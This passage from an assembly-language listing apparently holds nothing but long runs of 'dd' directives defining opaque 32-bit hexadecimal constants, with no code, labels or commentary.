233362F8h, 5E42B692h, 7346F2CDh dd 0FA4957D2h, 46CB486h, 4B992C2Ah, 0A68ACC89h, 1E342CC4h dd 63F37069h, 9E82F6D6h, 68C98DD0h, 28042C0Ch, 0A0928D5Dh dd 32BC6A80h, 0B1FC1228h, 0C5E7F583h, 7262504Bh, 21F4466Ch dd 0B0A7205Dh, 292CC970h, 5BEC0218h, 488C7F75h, 9BB10B68h dd 0CED2C1EEh, 8979E650h, 1E38A29Fh, 8F8BF208h, 2BCAD3FEh dd 5A686C0Ch, 2B2BEA4Ch, 664AA93Ah, 8A2BFAD5h, 0B6CCE0CDh dd 5E71E233h, 0B3913248h, 0AEF2C3E3h, 4CD10FC1h, 16141C7Ch dd 594327E5h, 727AC713h, 0F90C220Eh, 9EB6DA64h, 0D6B0F388h dd 0BA041A31h, 96ADC3B0h, 0C0C19580h, 67FC2413h, 8EA52A14h dd 0E2C73278h, 21A60A4Ah, 0B0A0AC5Dh, 7784DF70h, 5E840F6Dh dd 8194AAD3h, 1007E0FDh, 4D061110h, 4092C105h, 37414A60h dd 0D8BB7785h, 91D49A86h, 201048CDh, 0B1146F00h, 667D1B2Ch dd 264B150h, 8633E273h, 40170F2Fh, 83DA327Eh, 0AEF2E4BFh dd 3C6CE899h, 1164041h, 9080C47Dh, 0B19CF990h, 0F76CA637h dd 1327CAE0h, 70422D1Dh, 0BC147030h, 90393D8Bh, 0BB545CBCh dd 0A6791DE8h, 3A4BAD1h, 521BC5h, 36FCBB20h, 7963488Bh dd 2E44CE18h, 30C75C18h, 2AB09E49h, 1DB6C797h, 7369FA26h dd 76BABC3Fh, 3ADC4BD1h, 4B230DF2h, 589AEE25h, 7E2C2858h dd 0BED4EA14h, 0F383C1FAh, 0E120642h, 0A2E8A675h, 61981F2Dh dd 94C327Eh, 0EA4FD046h dd 0B6AD96BCh, 0FF5E2848h, 0B4BE98FAh, 0A6F79DAh, 178C2A1Ch dd 96540BEFh, 621879D9h, 0BE36E520h, 0AAFC7F55h, 22BC6AB6h dd 0C3FC1228h, 0AEDC8CFEh, 16624256h, 0FBD12F1Ah, 0A3E48AE6h dd 5D617A08h, 9FA34812h, 29948A8Eh, 1D7EC797h, 0A65FA26h dd 768CA214h, 49644A0Ah, 0D4490D5Bh, 0E584AC8Ch, 2039C6D5h dd 5DD48000h, 6BB5F9B3h, 0E21D201h, 93EAE2F8h, 97480C4h dd 3D5EA7B7h, 6A47DAC6h, 5D87D294h, 0FE142D28h, 2B015FE8h dd 19644C8Eh, 0E499DD6Bh, 1BB4FCDCh, 0CB080C48h, 0D8384A85h dd 120941D8h, 3E545C95h, 0D8B39FA5h, 408FBAE6h, 601D6212h dd 0D061F573h, 59C84F4h, 13A5A88h, 5B128989h, 48A8FA75h dd 0D431E268h, 0AEF48FBEh, 89769350h, 9462B9Fh, 0B151FBEBh dd 0E56E71B1h, 9BE26997h, 88E8BABDh, 0E1D861A8h, 5D9DD1A7h dd 8ACE7707h, 0E3F48A96h, 62A2723h, 0C6EEAEF1h, 566CF7A8h dd 0C5A6BFBFh, 1B3CD2DEh, 4E5244DFh, 311D5638h, 0A8AAA965h dd 465C7288h, 0A181DC30h, 96ACF4E6h, 0C1AA6269h, 9279D5D7h dd 8EA48CC5h, 6BCC6278h, 0D3F40EE2h, 0E8BCFDC2h, 0E2A351Fh dd 0BACC6477h, 5FF1CCA9h, 521C1D48h, 0EE819779h, 15ACCDCCh dd 7C512605h, 0A3A8937Ah, 4E8E9791h, 360C6278h, 0CBA7CA4Fh dd 1419FFC5h, 7C455D70h, 97A2879Ch, 3B2680ADh, 72725724h dd 0DDB7BF9Ch, 3E4CFBF4h, 87645A21h, 0C2D2B3C8h, 3E1C1FB0h dd 9778415Dh, 0BE98BE8Eh, 283D06FBh, 896A7354h, 9B81E2E2h dd 4A353D8Ah, 88957A4Bh, 0E2C59AB7h, 57284214h, 0B0952A59h dd 0EFF292ACh, 2303217h, 0A4836438h, 17E6CCE0h, 55583C0Dh dd 0B9C4B330h, 4CF8CBD9h, 7663406Dh, 0E6B9806Dh, 4EE1E8D1h dd 3A592D21h, 0D7A68C20h, 1518FCCDh, 61671A6Fh, 96ED8795h dd 3754FEE9h, 6F68123Bh, 8EE5BF9Dh, 254BF6D1h, 8A754660h dd 1454F38Dh, 5A4DF9C2h, 7D95329Eh, 0CCFC1165h, 0BBCE32BFh dd 6A00C354h, 97B8F21Fh, 0C384D7C0h, 0BFAB5813h, 6194807Bh dd 58690216h, 385AB15h, 869C69A1h, 2E445A70h, 0D6EC0218h dd 7E94AAC0h, 263C5268h, 0CEE4FA10h, 768CA2B8h, 1E344A60h dd 0C6DCF208h, 6E849AB0h, 162C4258h, 0BED4EA00h, 667C92A8h dd 0E243A50h, 0B6CCE2F8h, 5E748AA0h, 61C3248h, 0AEC4DAF0h dd 566C8298h, 0FE142A40h, 25DCD2E8h, 785BC635h, 538F2238h dd 9E82F520h, 5EB7D88h, 0F6579724h, 90E775D7h, 7ADFBA83h dd 0A4D7360Ch, 0B5BDC8DCh, 223F6A3Ah, 0F5E048ABh, 1315BE8Ah dd 2E7265CCh, 0E92C8791h, 7B7FAAF6h, 0C41490EBh, 0CA269BC9h dd 3A092AB8h, 0F6347C44h, 0C6DCF26Ch, 6E84BAD8h, 6FA9CF58h dd 0E7D4DC23h, 6A088A91h, 0EC20FAD3h, 2A491D0Fh, 9D74BC9Fh dd 8B1FEBBFh, 0AEF2FEBCh, 2693927Bh, 7D14A5BCh, 505ED600h dd 6D1DE719h, 0CC8F220Eh, 0B5B1BEE0h, 562E71BAh, 0B6F854BDh dd 0AC2F9C83h, 0C1501E80h, 19FFF91Ah, 0D94CAAA2h, 1DB39D87h dd 1E7921EEh, 0DE9C84F7h, 0ED701173h, 0E94C8797h, 0FB53AAF6h dd 260A6DF4h, 0CEE4FA10h, 768C9E50h, 82B1C160h, 2EDCC437h dd 917B6C00h, 162C5AB0h, 22696900h, 667CA497h, 93AD3225h dd 0B6FAC10Dh, 0D38B164Bh, 62A0DD4h, 0E415533h, 0DF6CB4A7h dd 0C82BB6D5h, 0A6BF3AE8h, 87577A90h, 769FA9FBh, 0CCB4CAE0h dd 0B9A29F60h, 2E9119CFh, 95ACF4E7h, 322EE956h, 0E1781D28h dd 0DA4BAD1h, 394C7202h, 0DEF4F7A4h, 8ADE39C8h, 0D08CB220h dd 53EFFDE7h, 7EA29500h, 0AC6C946Bh, 0CE1D7A18h, 8F0CBBCCh dd 5E373E4Eh, 8E5703E3h, 0B1651BB1h, 97F39D87h, 0F298AEF9h dd 3F90E7A8h, 0F7A7F27Bh, 143ED02h, 38748AA0h, 35E24AC9h dd 541D5C2h, 6C8298h, 8B1410C3h, 0B6F659EDh, 44EF787Bh dd 1E5DD33Bh, 614B3492h, 799CC78Bh, 6BA91A06h, 9957BA18h dd 3E54EE04h, 2649ED28h, 0DEA48CEFh, 0C9B23790h, 1E7109DFh dd 99C84F7h, 187B9AF5h, 0F2E80118h, 7C542993h, 9033895Bh dd 4EF61918h, 0B7DF8271h, 37306E44h, 0CAF5D614h, 85C4C194h dd 19D7C3B1h, 0CA0951D7h, 0CE871396h, 7AFF5415h, 0EF3763CEh dd 2A8B2B9Bh, 0D0E7B366h, 0DA686FD2h, 0C59703BEh, 8AE772A9h dd 0DB4753F6h, 3A972279h, 0B0F7A32Eh, 0EA55EFDFh, 76A7F386h dd 9AE53F0Fh, 36393DDEh, 65545CBFh, 190363C1h, 4C27E42Fh dd 0C8A38B6Ch, 0DF37F5DFh, 6EC4B6A2h, 0D1BBAF20h, 0F0CA9790h dd 0C6F2AAF6h, 0C43E4A59h, 0CCE71ED0h, 1C27C45Ah, 2BDC1266h dd 45230DFDh, 0BF039272h, 0FE744732h, 412B1F28h, 157F6828h dd 0C748A5Bh, 80EAC47Dh, 799F20A0h, 0AC445A22h, 0DBC72070h dd 0BE7D3280h, 1EBDF48h, 0A6BCD350h, 3AB6FE90h, 8ECF335h dd 7542212Ah, 465CCA8Dh, 0CAF9A30h, 3210167h, 3E625218h dd 3C0BC503h, 5214D13h, 364C5440h, 0D1FC0A20h, 665D725Dh dd 0A7C1AC7Bh, 0D7EC3420h, 73F2ACB5h, 35D777E1h, 0F66D7FE6h dd 38EA28Eh, 2F392C66h, 0A0D8192Dh, 8A19BBDh, 0E990AAF3h dd 0FD5F15FFh, 0D2E91B9Ch, 0A5240C6Fh, 3D49153Bh, 5E74BC98h dd 9143248h, 12C01A65h, 0A9F06A32h, 6B9DD5BFh, 0A68AED50h dd 76EDFF66h, 830D220Eh, 7585C5E4h, 0ED9C598Ah, 6581EDF3h dd 96ACF4E0h, 4A5C6A80h, 6379980Fh, 4FA48CE8h, 3B2A6998h dd 75924FABh, 0C364A78h, 187CDFF5h, 0CD0CC318h, 0F7F0CDC5h dd 0E60FF96Eh, 0DC0F5176h, 7303C600h, 9BBEE160h, 0C6EACA8Dh dd 8E45C2B4h, 0A6EFE940h, 0D8F401FCh, 7C7910h, 643DD1FBh dd 0AF24BAFCh, 0D38B7554h, 0E6DDE04Ch, 27C1BCF8h, 0BDC7E458h dd 54849A43h, 4EE4D082h, 0B19B8E90h, 0C478F0BCh, 76ECC28Ah dd 0B9A3817Ch, 2D76D0CEh, 5C5207ACh, 0F4AAA3F4h, 2C02C95Ch dd 445AB6A4h, 0FCB26E0Ch, 27440654h, 7B2C7F23h, 0DBF4939Bh dd 2E5CC7F3h, 0F3576B2Bh, 1004CAD5h, 45610D10h, 768C9480h dd 6AB44A60h, 6CBC420Bh, 560F1F47h, 162C426Eh, 0B9A0E200h dd 8AF7C710h, 0F96B9150h, 80F4697Dh, 5E7489A0h, 0D1983D49h dd 1EC4DAF0h, 0DFC72870h, 0C82B8EFDh, 0C5462E8h, 0E6D9F33Bh dd 10C1407h, 0A88C4165h, 465C7188h, 19116E30h, 0A094495Dh dd 3E546A80h, 0EF96629h, 715B4411h, 9DE68BC8h, 0E1508FABh dd 4917B2FEh, 93CD925Bh, 0D6DA3DB4h, 0C668E249h, 10C3360Fh dd 0A824C9BBh, 0FD095513h, 1D347C58h, 0B2DCF208h, 0E7016CBEh dd 962C7460h, 0FC3CEF74h, 0DE836D56h, 28AD5E37h, 0D00CD153h dd 0D5F17D0Bh, 51C0470h, 0DAC4DAF0h, 0DFE974CDh, 7E141C78h dd 0B854D79Dh, 0A69B856Eh, 9F3DF9Ch, 285CEA50h, 0A5A38D73h dd 11BC7C09h, 707A4CDh, 0B5C1E12Bh, 11FC2410h, 8D664D02h dd 434C6278h, 238AE234h, 992C4D37h, 0D1BFCA98h, 295464E7h dd 0EF3FCCD5h, 0ADF3D9C3h, 0F8DB5695h, 0FF4489B8h, 9BC3B628h dd 0C6EACA83h, 6E849AB3h, 93DB6C2Ch, 0BEE2D28Bh, 607C92A8h dd 8BD31824h, 0B6FADA73h, 5F748AA0h, 0F4F4373Dh, 593B250Dh dd 6054091Dh, 0FE142A40h, 4EB9A6ECh, 0B19B849Dh, 0CE87A7CFh dd 9EB0CAD6h, 51287288h, 11FA7DD8h, 56857A27h, 86FFA27Eh dd 0E288D220h, 76D1027Bh, 0C1E70593h, 0E8CC81A5h, 869CBAC8h dd 0AE0B2F70h, 0E0D48BA5h, 38E0AAC0h, 0D9C26980h, 0D6CD42EFh dd 0D3866B91h, 1E0272E5h, 0CCDF16C8h, 58BC1F15h, 0A79CE958h dd 375160AAh, 0CC7CA490h, 8B2E7AE0h, 0B6FADA7Dh, 0BCCCEC0Ah dd 8D99C5B5h, 0BEC4ECC8h dd 226C8298h, 545D9A47h, 5AC96A8Eh, 0A6D4D1F6h, 5DCC1192h dd 0A1247769h, 0C3AB72BEh, 0EE3222BBh, 96ACC2F8h, 66E463F5h dd 0DE7F9722h, 0E80EBAE6h, 0C18CE3C0h, 0E8CC81A5h, 869CF2C8h dd 0AE472E70h, 73E62ADCh, 7EA29243h, 9BB5F90Eh, 0CED2C584h dd 0FD095513h, 1E347C58h, 0B39CF208h, 6CD42AB9h, 2014C1DDh dd 3B234000h, 664AAA23h, 0E243AD0h, 0E7CE98Dh, 66F00FAAh dd 0EDB6327Eh, 9F7CBCCDh, 0DDE97580h, 0FE141C78h, 0D2BCD2E9h dd 444DCA92h, 0C034A69Dh, 9D500AE0h, 7ED8D782h, 45621A06h dd 662D7ABEh, 6DFEF77h, 0E4FC121Eh, 8CD1BAD0h, 9346AACCh dd 0DEC232A4h, 3B1519AEh, 2E7265C0h, 0D6C49AA0h, 0FB6301C0h dd 260A6AE3h, 0CEE4FA18h, 4764D3CCh, 0E9CBB59Dh, 0F0E4798Dh dd 6E809AB0h, 0A6273758h, 3B51E0B8h, 0CC7CA490h, 8BD377BBh dd 0B6FADA73h, 5E7482A0h, 0BE7A233Dh, 0BCE3A73h, 565ABA1Dh dd 3E278126h, 0C0A93942h, 447C5328h, 0C034A79Dh, 9D500AE0h dd 7ED9D782h, 45621A06h, 0AE27472Fh, 2E546AB6h, 5E9A1228h dd 8DD07A51h, 3C44A6F8h, 0E8CC8F85h, 8937D4C8h, 16CDDFC6h dd 3E47022Eh, 816B5600h, 1EB7D79Fh, 0CEE4FA26h, 7FF8E2B8h dd 9B361AD0h, 0C6EACA8Bh, 0E5016D1Ah, 162C7460h, 0ED4EA20h dd 627EE72Eh, 0F06BB754h, 8E4F4772h, 0D3FD8A96h, 62A0DD0h dd 52447196h, 0E66BF79Dh, 15BAA40h, 0DF5478A8h, 0B99B856Ch dd 0C034A9BDh, 9EF4CAE0h, 20E41488h, 5A066F01h, 2607A4F1h dd 0BBD16098h, 26FC2410h, 660EB930h, 0C9B39E2Ch, 5B038290h dd 86AA8A43h, 2E44DA70h, 505C006Dh, 46170F4Ah, 8D5A525Eh dd 0BBE10690h, 0F68C12BFh, 0B474B52Fh, 3920D9E0h, 0E5016D4Fh dd 162C7460h, 0CBD4EB00h, 6C3C22A3h, 381CB9D5h, 0B92748F8h dd 9EF732C6h, 3E9F9742h, 5A2DAC6h, 0A1C68328h, 0C82CA1C5h dd 0A4BCD2E8h, 0B94B0F90h, 0C034A9BDh, 9AB4CAE0h, 0F6460788h dd 6B8110F0h, 1CACF4E0h, 86CE025h, 0F61CD328h, 0FC202B6h dd 0DD4CD2D3h, 0D4B4BA28h, 0B0A4374Dh, 0ABB3F070h, 0D6DA3A93h dd 7E9CAAC0h, 9E5A421Dh, 6BEE1293h, 76BA9A3Ch, 1F84E106h dd 8E6CFAE3h, 56001FBAh, 0E186426Eh, 88EC6185h, 767C92A8h dd 7B518B50h, 357484DDh, 0DAD18058h, 601C0470h, 404E95Bh dd 69F43FB1h, 7BE32A76h, 0A68AEA63h, 4E447A90h, 81BD3D4Dh dd 26D2D10Bh, 0E3566A81h, 0EE3222B4h, 9CAF2618h, 86CEE25h dd 0CF577428h, 0B89B226Dh, 0BC8DE878h, 0E8CB9285h, 3637D4C8h dd 0ADC15828h, 7CEC3420h, 461F2F37h, 263F525Eh, 0EC90FB10h dd 4E07274Fh, 1E344A56h, 0D0A9F608h, 560F1F47h, 162C426Eh dd 0BBA1E900h, 99861640h, 0F48FD2AFh, 333B1D07h, 5E42B22Bh dd 0E1C3248h, 6774D984h, 0DDE97532h, 0FE141C78h, 0D23CD2E8h dd 6463CAB0h, 0C034A1BDh, 84540BE0h, 6254FB85h, 6DA11830h dd 56ACF4E0h, 0FAD46964h, 874CB92Ch, 711CDC7Ah, 0B5E96898h dd 0B8F43C18h, 0D194563h, 0E446C48h, 0A2EC0218h, 0F5115D93h dd 263C6450h, 0BAC4FA10h, 754B55B5h, 6A344A60h, 6C4C420Dh dd 0A90F695Bh, 29BCCFD3h, 7FFFEA36h, 0D680D321h, 8DA13008h dd 1CCCD4C0h, 66FF0F57h, 61C327Eh, 0A2B0DAB0h, 953C3AFEh dd 0C697AF4Ah, 0AC57D2DEh, 0AE9BC2F6h, 0CE8F8732h, 35D2CAD6h dd 7ED7F77Fh, 0EE071A06h, 0E5D8C3D8h, 6DFEF77h, 0E6FC121Eh dd 83D09AD0h, 364FA58Fh, 0DB800A20h, 6D362278h, 0A58BD183h dd 0E0D3AA9Dh, 0F75C81C0h, 0EF0FAE20h, 0F66F7FE7h, 768CA28Eh dd 10414AE0h, 0FE5F7785h, 660E9A86h, 15D5C218h, 0BA591273h dd 7658D665h, 6C4FB50h, 55676948h, 6FCCECA6h, 60B75488h dd 0C6445548h, 566C8220h, 5572CB42h, 6F3979B0h, 0F6027CE5h dd 5D6AE209h, 131E0950h, 7064EA0Dh, 6581ED30h, 96ACF4E0h dd 4B446A80h, 1ED7452Eh, 5BD5188h, 0CE674A2Bh, 537FDA0Bh dd 86AA8D78h, 11D4CF71h, 0EFED022Eh, 7AB0EE4Bh, 3654EFE1h dd 736FFA26h, 76BA9D2Ch, 21A4CF4Bh, 432BF23Eh, 6EB2A23Bh dd 162C4218h, 6623E874h, 66785003h, 0B3A76D06h, 0B6FADD30h dd 87F085A0h, 0EE1C3249h, 0AEC4DAFDh, 183EC7D3h, 0CC276605h dd 0EAF096C6h, 34F18590h, 7F0C1403h, 0A88B1665h, 1ED72188h dd 11DC190Ch, 0D527EAABh, 0CBB482B4h, 7377EDD7h, 8E92856Ch dd 3A0E6123h, 0E1148FA9h, 0C49FB2FEh, 0CAC1D378h, 5DEC3427h dd 0CD6B82B3h, 263C52E8h, 311143F8h, 0CA312947h, 48347C5Fh dd 39295FE0h, 0D211114Fh, 9D2C7467h, 0F4D7E24Ah, 0E5B2B9A4h dd 862B3FB9h, 0B6CCE398h, 5F2E0EAFh, 0B31F3248h, 0AEF2E530h dd 69EC379Bh, 0C2B82A76h, 439DD00h, 0C3647A90h, 7327267Eh dd 9E82F560h, 0AE0C748Bh, 11FBEF5Ah, 0A9107F5Bh, 4B546AB6h dd 0EABB2923h, 8FBF39DFh, 3AA76278h, 0E1489F19h, 393B2FEh dd 2E445B7Dh, 0E96C871Bh, 0FFF2AAF6h, 2919AD50h, 0CEE40695h dd 74CC29B8h, 4E00094Bh, 3929DFE0h, 0D239A34Fh, 192C7467h dd 0BED40E85h, 0A6F991A8h, 0D240C6Fh, 80F3627Dh, 757401A0h dd 84133E0Fh, 0AEC4DA3Dh, 5964C5A3h, 0FE14EEC3h, 0A47C51E8h dd 4D703D93h, 0C033A2BDh, 61E498E0h, 7063AE3Dh, 0D491E530h dd 0CCACF4E3h, 0BB5BAA05h, 0E6FC129Fh, 8EA42639h, 39B35E78h dd 0DEF49EA5h, 93A232C8h, 2ECFDF7Fh, 90670218h, 4AD781C1h dd 0D280BA38h, 73DD05EFh, 76BA9D04h, 9B373D15h, 0C6EACDC8h dd 51041FB3h, 93A5426Eh, 0BEE2D5E8h, 0E3479223h, 0E1205B0h dd 33F7EA8Ah, 5E42B544h, 6215B3Ah, 0DCB4DAF0h, 56736AAFh dd 0B0992A40h, 8D7D5914h, 5E267992h, 0C9E4A703h, 92C1CAD6h dd 0B94CB60Bh, 0CA409501h, 8D47A3C4h, 9ED1E543h, 86FC2417h dd 0B1240F5Bh, 6CA4624Eh, 0BF0BF5D5h, 869CB261h, 54A2FF0h dd 0DF9E0E5Fh, 719CEDFBh, 0D9C36EEAh, 4BEBB3EFh, 89735C0Ah dd 9F1076EBh, 0C6F479AFh, 917B65B0h, 976EA927h, 0BEB4CE4Ah dd 553272A8h, 2A28B190h, 8904677Fh, 0DBFD8A96h, 62A0D8Ch dd 864B637Dh, 0D36F8298h, 0FE2215C0h, 0E819778Eh, 0C67BCBBh dd 0FA4E092Ch, 764F8C26h, 460FF34Fh, 0EE011A30h, 0D025C2D8h dd 0FD0A357Ch, 6069ED7Fh, 4FA48CEBh, 0B3437D90h, 0DEF40B3Ah dd 0AEF6E698h, 0BBBBA51Ah, 0D6DA39FEh, 71CB6A45h, 263D57E0h dd 2BBE1210h, 67645D47h, 4D344A60h, 0AF9A866Dh, 0BD7FFDCh dd 7F5E373Bh, 0BE959374h, 59282757h, 9BDB3A66h, 0B6FAD9C2h dd 61280F29h, 1FF4327Eh, 0FDC4DAF0h, 3D0DD6FDh, 90636525h dd 0CECFA08Dh, 3C340AF9h, 9A655451h, 9ED1AD85h, 0AF779ADFh dd 0FDECE5CFh, 0C5ACC2D8h, 4D3138E5h, 838E7D5Ch, 0F8CDC880h dd 51290E11h, 36A30A45h, 79635BC5h, 2E444898h, 94895118h dd 0BFFC9A1h, 4F4E0218h, 0AB889366h, 218CC7DFh, 0E1DCBA88h dd 0C6C41AF7h, 0BD79AB0h, 784D2A1Bh, 0D19A8F67h, 1F1AFBDCh dd 784D4800h, 0D1A98E91h, 0B6238AC5h, 0F9E3DA85h, 2B498EA0h dd 565AB800h, 94444E2Ah, 334385E9h, 4E524162h, 9281EB1h dd 0A88FE475h, 0CB9C5888h, 0D83A4A8Dh, 0C6FC92D8h, 4CCDF7Fh dd 0E794121Eh, 0DAA4BED0h, 0C91B6312h, 0E8CB56B5h, 82F6E6C8h dd 72D1A527h, 55EC3427h, 0CB6BBE04h, 260A6D3Ch, 0F58E6FEFh dd 0B5D3A28Eh, 2064FFEDh, 398AF23Eh, 58BFF425h, 0E9D4C158h dd 0BE6F6E0Fh, 0E3F592A8h, 0E120530h, 499AE292h, 684F2035h dd 9DCB748h, 0AEC47E74h dd 6ACA998h, 0AE174010h, 0A6D4D382h, 18A47A90h, 0CD46B7C7h dd 6637CAD6h, 0AED87D77h, 67041A35h, 0A093A65Dh, 56D9E780h dd 6BFC2417h, 0B89BCA45h, 5C1E3378h, 4B0B5A20h, 86AA89BEh dd 21BBA2F3h, 0D6E9B49Ch, 8194C0C0h, 100336DDh, 0BC710510h dd 0F58C9483h, 9A3BB598h, 0C6DCF797h, 51FC1F39h, 0DF1F426Eh dd 0EE852903h, 3778F8F9h, 31408FAFh, 2333E2CEh, 5E42B1EEh dd 8213F2CDh, 0AEC4DF8Bh, 0D3E54BABh, 0FE22153Ch, 0CEED83B9h dd 4E6B7A8Fh, 6099DD68h, 1BB4FCDBh, 72D87D48h, 67041A35h dd 0A093425Dh, 0D1ECA980h, 6DFC1247h, 0B53829Bh, 367A5AF3h dd 0CEF40A20h, 39FB4BDh, 2E724A18h, 17EFD02Bh, 9F635B37h dd 19B0D7E1h, 595CFA26h, 0FD8CA290h, 9B37762Bh, 0C6EAE260h dd 0AF874883h, 0F7DBB3AFh, 81506F89h, 69BF929Eh, 0F72271E7h dd 0E541D71Bh, 1DC385B8h, 4FCC315Ch, 0ADEC1B9Bh, 9560348h dd 77A4337h, 0DC3FCF9Ch, 0AE167B9Ch, 7D3069B3h, 0DCB7DEA2h dd 0E18FF98h, 0CDDDEDCFh, 0EE29F919h, 0FD545CBFh, 0F6D846A3h dd 0C2B7AE3h, 364C62C0h, 353B81E3h, 0D6213FC3h, 0D2446C4Eh dd 1FDFDD93h, 0CF5966Ch, 51466E6Eh, 64C4D612h, 9AF8FE84h dd 0C340645Ch, 2EA9F234h, 6F0F5353h, 53740765h, 83DF9E00h dd 662ED1FBh, 0F117BF5Fh, 0B5471D07h, 103DDD9Dh, 20983D0Bh dd 933B250Fh, 1839C1CFh, 10FAE4Fh, 0F1812D17h, 415649D3h dd 9F332BCh, 0CDE4F71Fh, 0C2533DDCh, 11FBE535h, 0BB4419EBh dd 4BAB957Eh, 1A06FA38h, 0AF4C452Fh, 39B39D86h, 210AE6A4h dd 6E4E8137h, 2E445A66h, 291361F0h, 7E94423Fh, 0A7615268h dd 0F8D7C3FDh, 75574BB8h, 0E1504A60h, 4669793Ah, 0A84AC8Fh dd 974A60D1h, 0B18EA73Eh, 667F562Dh, 327AB150h, 37AA3CFBh dd 5131DA9Bh, 61F86CDh, 0B8872DF0h, 566CA298h, 0FDB3AF4Fh dd 0E54AD2E8h, 0CA6B78CCh, 0F60C21A5h, 0A3BC896Bh, 0E6FCD228h dd 0ED8B9E3Fh, 0B691C2D8h, 31744AA0h, 0E6FF96ACh, 701D52D0h dd 0B4439D87h, 0DEF40959h, 0B958174Bh, 0A5445A46h, 9C670A5Ah dd 0D5581D0h, 0CDFC616Ch, 472CF915h, 0F305B2F2h, 1E0275E8h dd 7ED0B80Bh, 6E859AB0h, 0F186AA09h, 2BE415FFh, 664AAA21h dd 0BB141AE1h, 0B6FADA72h, 978AAACAh, 0EE084A10h, 513B3D60h dd 0C263501Dh, 0CFF6F982h, 9084597Dh, 0B9819190h, 0C034A9BDh dd 9EB4CAE0h, 0B17E0689h, 0D83C91B5h, 96ACC1D8h, 0BF581F80h dd 0D0C4998Dh, 715B45D0h, 0B7468983h, 0E8CC81ADh, 869CB2C8h dd 2E423278h, 0BEB50218h, 7E94AAC6h, 0C17EBA30h, 4B6E05EFh dd 76BA9A3Bh, 9D1ECEE6h, 4EDCC430h, 58BC1935h, 0E1CCA058h dd 88EC6185h, 667C9AA8h, 8E2D4F50h, 80F46745h, 9B008BA0h dd 3E97B7BFh, 0AEC4DAC6h, 4D188A98h, 0C69797C0h, 0D2B9D2DEh dd 0CAD9FA20h, 0F30C1400h, 23346D94h, 466A4A0Dh, 199A6E35h dd 0A094495Dh, 3E546A80h, 66F566A8h, 0B89C396Dh, 0BF3B6078h dd 0E13CAFA3h, 6E9CB2FEh, 0D1BBA977h, 291163F0h, 7CE4423Fh dd 0BBB75268h, 0CED2C594h, 49043FBBh, 67DC4A56h, 0C9230DF4h dd 6E86CA34h, 9699C958h, 35D4DC3Fh, 0B87FAEF6h, 0F1D940B8h dd 8C4EED07h, 0DF748AA2h, 67C1602h, 504F3AF0h, 2C6FD4CAh dd 0EE6E2954h, 9E37571Fh, 4E647AA6h, 0E2793238h, 0A1787769h dd 0F3D172BEh, 0EE3222A8h, 86C44F53h, 9AA76AB6h, 0ECDAAB7Fh dd 3B29BAD0h, 367A7278h, 0DE45AFD3h, 226FB02Bh, 16CFDF87h dd 0D6EC022Eh, 0FA9BBAC0h, 263C52C6h, 26CC89EFh, 89734C0Eh dd 2188DFEBh, 1459F23Eh, 6E1C1EBFh, 0A3A74258h, 0BEE2D580h dd 0E76CD823h, 0E441E1Ah, 0FCE702F8h, 6D76F9A8h, 126E3181h dd 0BEAC57CBh, 0DBE782AEh, 0FE223A28h, 9A37849Ah, 26C1F9B4h dd 0F60C1428h, 9EDC6D63h, 0CD5C7288h, 0A405124Ah, 115BC1D0h dd 0AAD1E177h, 11FC2417h, 0B89C3155h, 364C2278h, 29F67E20h dd 8AEEB1D0h, 9BCD6A59h, 0D6DA3DD0h, 7FBCD94Bh, 0ADB9A558h dd 8EE4CC28h, 28CA2B8h, 4F2CBD62h, 3920BBE0h, 626FC34Fh dd 3D04315Bh, 0E885E672h, 3F23365Bh, 36BC8FDDh, 0B45E2CEh dd 5E42B56Ch, 584396BBh, 2356EBFFh, 566C561Fh, 77811040h dd 0D3BCE4D0h, 36B61396h, 7E1E166Eh, 255C3AB0h, 1CA38D52h dd 0ED0850BBh, 135BD292h, 3E62520Bh, 0F6FC1228h, 0FBA1FB5Dh dd 0FEC1EB6Bh, 0DDF43C1Fh, 0B08CDA4Dh, 46E3D970h, 0D6EC0218h dd 0F7BCE9EBh, 263C01EFh, 86610D10h, 778C9484h, 6A344A60h dd 0CE9F350Fh, 0CE243A10h, 2EA7C7AFh, 0BED4EA36h, 610812A8h dd 0F95ED202h, 3D961D07h, 684B422Dh, 8F19D148h, 0A32FF2BBh dd 69A80F13h, 0FCF72A76h, 0ED37D103h, 0C5E18DB8h, 0F50C1400h dd 0EAB4CAE0h, 8AD9F99Ch, 0ED042C0Fh, 0A0937A55h, 8AD16980h dd 0E7FC2417h, 9EEE31D8h, 9C8E7F3h, 94CD0A16h, 0F9FC1C0h dd 6C45523Ah, 8E8F8108h, 0F21121C0h, 4E3C6457h, 0CEE4D288h dd 2F84E0B9h, 94640961h, 0F0E47B9Dh, 0E5016DB0h, 162C7460h dd 0CAC4EA00h, 0EF191AEh, 0B8240C40h, 3D4915F8h, 5E74BC98h dd 731C3048h, 590224E4h, 6054091Dh, 0FA142A40h, 2CBAA7E8h dd 785CF025h, 7D89D538h, 9EB4FCD8h, 335C72C8h, 0EC03903Bh dd 40AE681Ah, 37BF9D62h, 24CE15A2h, 6C72B87Ah, 529E518Fh dd 519028ABh, 3B1FEACAh, 2E726514h, 8680D18h, 816B553Ah dd 1003D2DDh, 74710510h, 898C9483h, 280B36D5h, 0E8490D08h dd 0E384AC8Bh, 20132AD5h, 0CE416700h, 377CA497h, 0F1245002h dd 80F3864Dh, 0F0E175A0h, 0F91C0473h, 98FBBE45h, 78F97D98h dd 73141C7Bh, 9082825Dh, 2ED18590h, 0A00C1407h, 0A51E5F1Fh dd 0E3DF72BEh, 0EE322554h, 964401D8h, 63546A80h, 0B7D1342h dd 8E928D46h, 0F7439220h, 0E8E17EA5h, 455C37C8h, 0DEBB92F3h dd 0A269C317h, 0BD949CD5h, 0C3C4255h, 0A8F88F10h, 7AA8DE39h dd 0D413B0Ch, 39181A68h, 6BF1654Fh, 0E9D696B0h, 410602FFh dd 481D6D57h, 585C17AFh, 9374F0CCh, 3E748AA0h, 0F9E397A0h dd 25FDAF0Fh, 0DB5CA6DCh, 0C82A7AF5h, 0AEEC59E8h, 485EFBF6h dd 0A029513Ah, 61B4CA88h, 2C98F988h, 11544830h, 0A097384Dh dd 3690E980h, 0D9A02CA9h, 8DD1E6EFh, 0DE48A4FBh, 210BF0A1h dd 7963CD20h, 96873B8Fh, 0D6EC026Ch, 512C1B2Bh, 0CE3C5268h dd 0CEE4FA0Dh, 0CE8C827Ah, 1E344A50h, 0C6DCE2E0h, 6EA058B0h dd 162DC7E0h, 0BED70200h, 4ABE92A8h, 2A70B750h, 35E22FF4h dd 47088A58h, 61CDA28h, 0FA4FDAF0h, 0DD31B2BCh, 93F9AB5Ah dd 4EBCE4D0h, 0B19B9B44h, 